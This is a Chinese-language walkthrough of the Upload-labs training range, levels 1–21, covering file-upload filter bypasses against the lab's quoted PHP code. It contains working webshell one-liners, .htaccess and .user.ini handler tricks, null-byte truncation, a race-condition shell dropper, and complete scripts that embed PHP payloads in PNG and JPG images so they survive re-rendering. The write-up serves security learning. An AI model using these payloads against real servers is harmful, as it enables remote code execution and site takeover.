Upload-labs靶场Pass01-Pass21全解

news2024/12/25 9:24:51

文章目录

  • Pass-01 前端JS
    • JS绕过上传
    • 或者用burp抓包的方式
  • Pass-02 MIME检测
  • Pass-03 特殊文件后缀
    • 黑白名单绕过
    • 特殊文件名绕过
  • Pass-04 .htacess上传
  • Pass-05 user.ini文件上传
  • Pass-06 大小写绕过
  • Pass-07 空格绕过
  • Pass-08 .绕过
  • Pass-09 ::$DATA绕过
  • Pass-10 .空格.绕过
  • Pass-11 双写绕过
  • Pass-12 %00截断
  • Pass-13 %00截断
  • Pass-14 上传图片马
  • Pass-15 上传图片马
  • Pass-16 上传图片马
  • Pass-17 上传图片马
    • 上传gif图像
    • 上传png图片
      • IHDR
      • PLTE
      • IDAT
      • IEND
    • 上传jpg图片
  • Pass-18 条件竞争
  • Pass-19 条件竞争
  • Pass-20 /.绕过
  • Pass-21 数组绕过

Pass-01 前端JS

前端JS的检验
加载时弹出对话框
绕过:

1.利用BP工具
2.修改webshell为允许上传类型

先上传个a.php试试,发现弹窗口,只能上传jpg、png、gif类型的图片

image-20240722154750390

写个一句话木马,尝试上传

image-20240722165703450

JS绕过上传

可能是前端存在过滤,打开F12检查一下,发现是checkFile()函数存在过滤

image-20240722164008313

禁用JS,因为这个checkFile()函数是前端的脚本,所以如果经用了JS,实际上就是禁用这个检测的checkFile函数,或者直接删除掉这个checkFile的函数,因为如果要禁用JS的话,就有可能禁用掉正常的JS代码,可能会影响文件的正常上传

然后再次上传a.php,发现上传成功了(然后用hackbar)

image-20240722163356584

image-20240722163443855

或者用burp抓包的方式

image-20240722164259262

修改后缀的png变成php,然后重新发包

可以看到已经上传成功,得到了图片的url

image-20240722164602326

然后用蚁剑连接一下,就可以连接后台噜

密码就是一句话木马上传的那个

image-20240722165453034

image-20240722165605870

Pass-02 MIME检测

服务器MIME检测:检测Content-Type的内容
绕过:修改类型

php文件上传,发现不行

image-20240722170940270

然后将其后缀改成png并抓包

image-20240722171257331

可以看到文件类型为png

image-20240722171414269

修改一下后缀,和上道题的方法相同

image-20240722171345088

然后连接蚁剑,拿到后台

image-20240722171619240

Pass-03 特殊文件后缀

特殊解析后缀

服务器文件名拓展名检测(检测根文件 extension 相关的内容)
 
基于黑名单检测:黑名单的安全性比白名单的安全性低很多,攻击手法自然也比白名单多。一般由个专门的blacklist,里面包含常见的危险脚本文件。
绕过:1.文件大小写让绕过(Php ,PhP pHp,等)
     2.黑白名单绕过(php,php2,php3,php5,phtml,asp,aspx,ascx,ashx,cer,asa,jsp,jspx)cdx,\x00hh\x46php
     3.特殊文件名绕过
(1)修改数据包里的文件名为 test.php 或 test.asp_(下划线是空格)由于这种命名格式在       windows系统里是不允许的,所以在绕过上传之后windows系统会自动去掉.点和空格。Linux和      Unix中没有这个特性。
(2)::$DATA(php在windows的时候如果文件名+"::DATA"会把::DATA之后的数据当作文件流处 
理,不会检测后缀名,且保持"::DATA"之前的文件名,其目的就是不检查后缀名)
     4.0x00截断绕过(5.2 C语言中将 \0 当作字符串的结尾)
     5.htaccess文件攻击(结合黑名单攻击)
     6.解析绕过

上传3.php,发现失败了

查看一下源代码吧

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

浅浅分析一下:isset是确定上传按钮存在

file_exists是确定上传路径存在

deny_ext是删除后缀名为’.asp’,‘.aspx’,‘.php’,‘.jsp’

trim:是php的函数,是去除字符串首尾的空白符

deldot是即从字符串的尾部开始,从后向前删除点.,直到该字符串的末尾字符不是.为止

strchr:查找.的第一次出现,并返回此字符串的其余部分

strtolower:把所有字符都转换为小写

str_ireplace:把不允许的后缀名都给删除了,并且不区分大小写 ,将::$DATA替换为空

黑白名单绕过

在某些特定环境中某些特殊后缀仍会被当作php文件解析 php、php2、php3、php4、php5、php6、php7、pht、phtm、phtml。

image-20240722172348649

我们可以试试将3.php改成3.php3

image-20240722172444101

上传成功了,但是文件名的名字发生改变

image-20240722173535403

特殊文件名绕过

进行特殊文件名绕过

image-20240722173301849

可以发现成功上传,但是文件名有变动

image-20240722173458171

Pass-04 .htacess上传

.htacess上传绕过

文件上传之.htaccess绕过黑名单——upload-labs靶场第四关

.htaccess上传绕过文件上传黑名单
Apache服务器允许在每个目录下存在一个名为.htaccess的文件,.htaccess是一个纯文本文件,该文件可以作为Apache辅助配置文件,仅在当前目录生效。.htaccess文件可以实现URL重写、自定义错误页面、MIME类型配置以及权限访问控制等。起到了伪静态应用、图片防盗链、自定义404错误页面、允许或阻止特定IP地址范围访问、目录浏览与主页、禁止访问指定文件类型以及文件密码保护等等的作用。

.htaccess只针对Apache服务器有效

上传一个php文件,发现不能上传

image-20240723104354139

查看源码:

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

上一道题因为过滤了上传文件的文件名后缀,所以我们可以使用php5、phtml、php3、phps等后缀名来进行绕过,但是这一关将这些后缀名也进行了过滤,所以我们可以用.htaccess上传来绕过

可以上传一个.htaccess的文件

创建一个.htacess的文件,里面写入:
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
FileMatch表示匹配4.png的文件,当该文件匹配成功后,setHandler表示将文件名中有“4.png”的文件作为PHP类型的文件来进行处理

然后再上传4.png,利用图片构造HackBar请求

image-20240723115002670

Pass-05 user.ini文件上传

user.ini文件上传

Upload-labs Pass-05 .user.ini文件上传-CSDN博客

.user.ini文件上传
从上一关,我们可以知道.htaccess可以覆盖apache的配置文件,而user.ini 则可以覆盖php.ini的配置

.htaccess文件只能用于apahce,不能用于iis和nginx等中间件
.user.ini只能用于Server API为FastCGI模式下,而正常情况下apache不是运行在此模块下的。
.htaccess和.user.ini都只能用于访问本目录下的文件时进行覆盖。

所以先创建.usere.ini文件

里面写入:
方法一:
auto_prepend_file = 5.png         //包含在文件头
方法二:
auto_append_file = 5.png          //包含在文件尾

.user.ini文件的意思是:所有的php文件都自动包含一个5.png文件。user.ini相当于一个用户自定义的php.ini

然后上传.user.ini,再上传5.png

发现上传成功

image-20240723114628128

直接查看图片路径会现在解析图片错误,是因为只有在访问php文件时,才会自动包含5.png,所以作者给了提示在上传目录下是有一个readme.php文件的,所以直接访问此文件就可以包含上传的shell

image-20240723115143474

Pass-06 大小写绕过

大小写绕过

上道题的源码,有个strtolower

image-20240723140534545

这道题的源码:

image-20240723140645018

可以看到没有strtolower了,所以直接用大小写绕过

利用BP抓包看一下,修改一下大小写

image-20240723120826066

大小写绕过原理:
Windows系统下,对于文件名中的大小写不敏感,例如test.php和TeSt.PHP是一样的。
Linux系统下,对于文件名中的大小写敏感,例如:test.php和 TesT.php就是不一样的。

Pass-07 空格绕过

空格绕过

查看源码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

与上道题源码的区别就是缺少了 ,Window会强制去除空格

报出错的试试改源码,echo输出tempfile和imgpath再试试

 $file_ext = trim($file_ext); //首尾去空

所以使用空格绕过,但是我没执行出来

image-20240723145320919

这道题可以用双写绕过,看到成功上传

7.php的后面加上::DA::DATATA

image-20240723151521026

image-20240723152936557

Pass-08 .绕过

.绕过

查看源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

发现对文件后缀没有进行去.操作

在Windows系统下,文件后缀最后一个点会被自动去掉

但我好像没执行成功QAQ,先记一下这个方法吧

Pass-09 ::$DATA绕过

Windows文件流特性绕过

://DATA必须在Windows下,php在Windows的时候如果文件名加上://DATA会把$DATA后面的数据当作文件流处理,且保持$DATA之前的文件名,目的就是不检查后缀名

查看源代码

 if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空

可以看到少了 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA这一行,在9.php的后面增加::$DATA,上传成功

image-20240723152552791

image-20240723152730542

Pass-10 .空格.绕过

用.空格.绕过

查看源代码:

if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

和前面的报错没有不同,但是没有做循环处理,所以在文件名后加上. .

讲一下为啥能这么写

经过deldot将点去掉变成.空格 然后trim首尾去空,将空格去掉,变成一个点,就成了上面的.过滤,

Pass-11 双写绕过

文件名双写绕过

查看源码:

if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;  

str_ireplace就是把不允许的后缀名都给删除了,并且不区分大小写

从底下也能看到把php给删除掉了

image-20240723162950818

执行成功

image-20240724085235878

Pass-12 %00截断

%00截断

这道题需要配置一下环境,这个00截断需要php的环境小于5.3.4,同时magic_quotes_gpc需要off的状态

然后配置环境的时候,还遇到了php下载不下来的情况,是说网络不稳定

解决方案:PHPStudy 下载PHP提示“当前网络不稳定,下载失败”_php5.2.17下载不了 phpstudy-CSDN博客

查看一下源码:

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

ext_arr是白名单的限制,只能上传这些东西

file_ext是通过查找文件名中的最后一个点.来确定文件扩展名`

if(in_array)是检查文件扩展名是否在允许的列表中

temp_file获取上传文件的临时路径

img_path构造目标文件的完整路径和文件名,包括一个随机数和当前时间戳以确保文件名的唯一性

image-20240724085750316

上传一个php文件,发现又变成白名单了

抓包,仔细观察一下,发现前面有个上传路径

image-20240725090951183

可以用%00进行截断,

00截断的原理是啥捏?

关于上传中00截断的理解与分析 | Tatsumaki’Blog

0x00是字符串结束的标志,通过手动添加字符串的方式,将00后面的内容进行截断,但是00后面的内容又可以帮助我们绕过文件检测

00截断不能在文件名处修改,比如1.php%001.png,在程序提取后缀名的时候,遇到%00就自动结束了,所以它提取到的后缀名还是.php
所以00截断用在文件上传路径的地方,path:/uploads/ 因为这种情况path:/uploads/1.php%00就是上传1.php

%00截断什么时候进行urldecode捏?

path在url、cookie或者上传方式不是multipart/from-data的时候,就不用进行url编码

当path存在url、cookie里面的时,在提交数据的时候,浏览器会对数据进行url编码,到服务器,则会对数据进行一次解码操作(GET会自动解码,POST不会自动解码,反正GET方法不用对%00进行urldecode,而POST需要对%00进行urldecode)

然后这道题在12.php后面加上%00发现上传成功了

image-20240725092957409

执行成功

image-20240725093224281

Pass-13 %00截断

00截断

可以看到它的上传路径写在了底下,就是POST型,需要对%00进行urldecode

image-20240725093716835

image-20240725093919780

执行成功

image-20240725094032580

Pass-14 上传图片马

上传图片马

PHP中pack、unpack的详细用法_php unpack-CSDN博客

image-20240724093912714

这道题要求我们上传一个图片马到服务器

Png图片文件包括8字节:89 50 4E 47 0D 0A 1A 0A。即为 .PNG
Jpg图片文件包括2字节:FF D8。
Gif图片文件包括6字节:47 49 46 38 39|37 61 。即为 GIF89(7)a。
Bmp图片文件包括2字节:42 4D。即为 BM

打开cmd,/b表示二进制文件binary/a代表文字文件ascii

copy logo.jpg/b + shell.php/a shell.jpg

shell.php里面就是要执行的一句话木马

<?php 
phpinfo();
@eval($_POST['cmd']);
?>

其实就是将shell.php里面的一句话木马插入到这个图片中,也可以直接在图片中插入也行(就是害怕直接插入图片不能正常显示,所以用的上面的那个命令)

image-20240724103016731

以png图片为例,jpg,gif图片应该都差不多

可以看到上传成功,然后执行就行

image-20240724103344436

因为这个包含一个文件上传漏洞

所以应该是可以用文件上传漏洞执行里面的Php代码

image-20240724105619555

然后查看一下源代码:

$strInfo = @unpack("C2chars", $bin); 

有个unpack的函数从二进制字符串对数据进行解包

Pass-15 上传图片马

上传图片马

还是上传一个图片马,所以先查看一下源代码吧

  $info = getimagesize($filename);

可以看到有个getimagesize用于获取图像大小以及相关的信息,成功返回一个数组,失败则返回FALSE并产生一个错误信息

和上道题差不多吧

image-20240724105831825

Pass-16 上传图片马

上传图片马

直接查看页面源代码:

$image_type = exif_imagetype($filename);

exif_imagetype用来判断一个图像的类型

但是这个需要开启php_exif模块

服务器配置说明:

1.在php.ini文件中找到;extension=php_exif.dll,去掉前面的分号
2.在php.ini文件中找到;extension=php_mbstring.dll,去掉前面的分号,并将此行移动到extension=php_exif.dll之前,使之首先加载*。

3.找到[exif]段,把下面语句的分号去掉。

;exif.encode_unicode = ISO-8859-15
;exif.decode_unicode_motorola = UCS-2BE
;exif.decode_unicode_intel = UCS-2LE
;exif.encode_jis =
;exif.decode_jis_motorola = JIS
;exif.decode_jis_intel = JIS

Pass-17 上传图片马

难一点的上传图片马

upload-labs之pass 16详细分析 - 先知社区 (aliyun.com)

吼,本来想按刚刚的那个方法试一下的,发现不行欸QAQ

查看一下其中一段源代码吧

上传gif图像

在网上先下载一个Gif图片,将<?php phpinfo();?>添加到Test.gif的尾部image-20240724113854621

成功上传

image-20240724114023650

打开上传到upload文件夹的gif图片

image-20240724114159890

发现刚刚上传的php代码被删除掉了

关于这个gif的二次渲染,我们只需要找到渲染前后没有变化的位置,然后将php代码写进去,就可以成功上传有php代码的文件

对比一下,蓝色部分是没有发生变化的

image-20240724114914286

将php代码插在前面

image-20240724115119185

然后再保存下来,重新进行上传,发现变成小白人了,哈哈

image-20240724115217485

可以看到php代码没有被删除

image-20240724115501309

所以成功上传图片马

上传png图片

这个好难QAQ

先下载一个png图片

分析一下png图片

png定义了两种类型的数据块 。一种被称为关键数据块(标准),一种被称为辅助数据块(可选),

数据块的结构

IHDR

数据块IHDR:它包含有PNG文件中存储的图像数据的基本信息,并要作为第一个数据块出现在PNG数据流中,而且一个PNG数据流中只能有一个文件头数据块。

PLTE

调色板PLTE数据块是辅助数据块,对于索引图像,调色板信息是必须的,调色板的颜色索引从0开始编号,然后是1、2……,调色板的颜色数不能超过色深中规定的颜色数(如图像色深为4的时候,调色板中的颜色数不可以超过2^4=16),否则,这将导致PNG图像不合法。

IDAT

图像数据块IDAT(image data chunk):它存储实际的数据,在数据流中可包含多个连续顺序的图像数据块。

IDAT存放着图像真正的数据信息,因此,如果能够了解IDAT的结构,我们就可以很方便的生成PNG图像

IEND

图像结束数据IEND(image trailer chunk):它用来标记PNG文件或者数据流已经结束,并且必须要放在文件的尾部。

直接用生成好的图片

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

看到已经写入了

image-20240724143638712

看看这个命令<?=$_GET[0]($_POST[1]);?>,首先$_GET[0]指的是以0为参数进行GET传参,其次$_POST[1]指的是用1来接受POST提交上来的数据

上传图片可以上传

上传jpg图片

先在网上下载一张jpg的图片

现将这张图片进行上传,然后将上传的图片下载下来

image-20240724145141176

使用下面这个脚本,将图片进行处理

<?php
    /*

    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
    It is necessary that the size and quality of the initial image are the same as those of the processed image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:
    jpg_payload.php <jpg_name.jpg>

    In case of successful injection you will get a specially crafted image, which should be uploaded again.

    Since the most straightforward injection method is used, the following problems can occur:
    1) After the second processing the injected data may become partially corrupted.
    2) The jpg_payload.php script outputs "Something's wrong".
    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

    Sergey Bobrov @Black2Fan.

    See also:
    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

    */

    $miniPayload = "<?=phpinfo();?>";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

执行命令为:php jpg_payload.php 1205354342.jpg

image-20240724150333034

可以看到已经写入php代码

image-20240724150314330

Pass-18 条件竞争

条件竞争

查看一下原代码:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

file_ext是获取文件上传的扩展名,即文件的最后一部分

upload_file拼接出文件的完整路径

in_array检查是否在白名单中

rename将文件进行重命名

unlink如果上传的文件不在允许的类型数组中,则设置错误的信息,并删除上传的文件

条件竞争涉及到的就是操作系统中所提到的进程或者线程同步的问题,当一个程序的运行的结果依赖于线程的顺序,处理不当就会发生条件竞争。

有一定的处理顺序,就像这道题先是进行上传然后进行重命名

就像在当我们在手机端进行提现操作时,账户余额为500元,向服务器发送提现500元的请求,提现完毕后账户余额应当清零。那么如果在我提现成功和它进行清零事件的间隙时间里,我再次发送出提现500元的请求会发生什么呢?条件竞争利用成功的结果就是多了500大洋。

所以对于这道题,我们可以在判断白名单和unlink的操作之间上传一个木马

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>');?>写入shell.php

image-20240724160005999

image-20240724160035260

image-20240724160128404

不断访问上传的shell.php文件,一旦有200的状态码,说明条件竞争成功

接着用Python脚本去不停的访问shell.php,一直到成功

import requests
url = "http://192.168.181.203:8014/upload-labs/upload/test.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break

当出现ok时,可以停止BP

image-20240724163123711

Pass-19 条件竞争

条件竞争

上传以后在哪个图片,可以看到图片的上传路径发生改变

image-20240724163943094

查看一下源码

image-20240724164317242

然后和上一题差不多的说

Pass-20 /.绕过

/.进行绕过或者是00绕过

查看一下原代码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

move_uploaded_file:会忽略掉文件末尾的 /.,主要作用是将临时文件移到指定的目标路径,并确保文件在移动中不会被删除或覆盖。

image-20240725103154107

执行成功

image-20240725103222082

Pass-21 数组绕过

数组绕过

查看一下源码:

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

需要分析一下

可以看到注释上有

1.检查了MIME

2.检查了文件名

3.判断$file是否是数组,不是数组以.来分割数组 is_array — 检测变量是否是数组 explode — 使用一个字符串分割另一个字符串

4.取 $file 最后一个元素,作为文件后缀进行检查

5.取 f i l e 第 一 位 和 第 ‘ file 第一位和第file第一位和第‘file[count($file) - 1]作为文件名和后缀名保存

数组首元素和数组最后一个元素进行拼接

首先我们肯定要绕过对非数组进行分割处,不然直接被卡死了。如果我们传入的数组为save_name=["muma.php","jpg"],这样可以绕过后缀检测,但是一直到命名处$file[count($file) - 1]对应的是”jpg”,那么最终文件命名为muma.php.jpg这种情况。我们需要的是muma.php,可以试着将数组传为save_name=["muma.php",不设置,"jpg"],当我们save_name[1]不设置的时候,count结果仍然是2,但是文件名后缀拼接出来为空,结果为muma.php. 再根据windows特性将.省略,达到文件上传的目的

